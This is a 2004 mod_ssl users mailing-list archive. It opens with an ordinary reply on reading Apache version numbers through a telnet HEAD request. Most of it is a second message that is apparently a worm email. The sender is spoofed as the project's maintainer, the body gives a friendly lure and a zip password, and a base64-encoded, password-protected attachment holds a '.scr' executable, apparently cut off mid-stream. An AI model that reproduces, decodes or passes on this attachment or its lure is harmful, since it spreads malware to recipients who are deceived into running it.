X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 29 Mar 2004 chuck@fiu.edu wrote:

> I wish I had the info but I didn't build it.   I switched back to an
> earlier version of the executable and it works fine.  [Looooooong story]

You don't need to be the one who built it.

You can get the version numbers just by asking Apache.  telnet to port 80
and issue a HEAD request, something like this:

-----------------------------------------------------
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HEAD / HTTP/1.0
Host: localhost

HTTP/1.1 200 OK
Date: Mon, 29 Mar 2004 21:55:24 GMT
Server: Apache/1.3.29 (Unix) PHP/4.3.5 mod_ssl/2.8.16 OpenSSL/0.9.7d
Connection: close
Content-Type: text/html

Connection closed by foreign host.
-----------------------------------------------------

You can find out what the session cache, client cert, and CRL settings are
just by looking in the config file.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 13:38:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D7C8FA8963; Tue, 30 Mar 2004 13:38:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Joyce (wmu-53-169.tm.net.my [202.188.53.169])
	by master.modssl.org (Postfix) with SMTP id 658DBA8995
	for ; Tue, 30 Mar 2004 13:37:49 +0200 (CEST)
Date: Tue, 30 Mar 2004 19:37:40 +0800
To: modssl-users@modssl.org
Subject: Hey, dude, it's me ^_^ :P
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wqjpsvpybkcbejbgbdtv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wqjpsvpybkcbejbgbdtv
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i don't  like  the plaintext :)

pass: 56270

----------wqjpsvpybkcbejbgbdtv
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
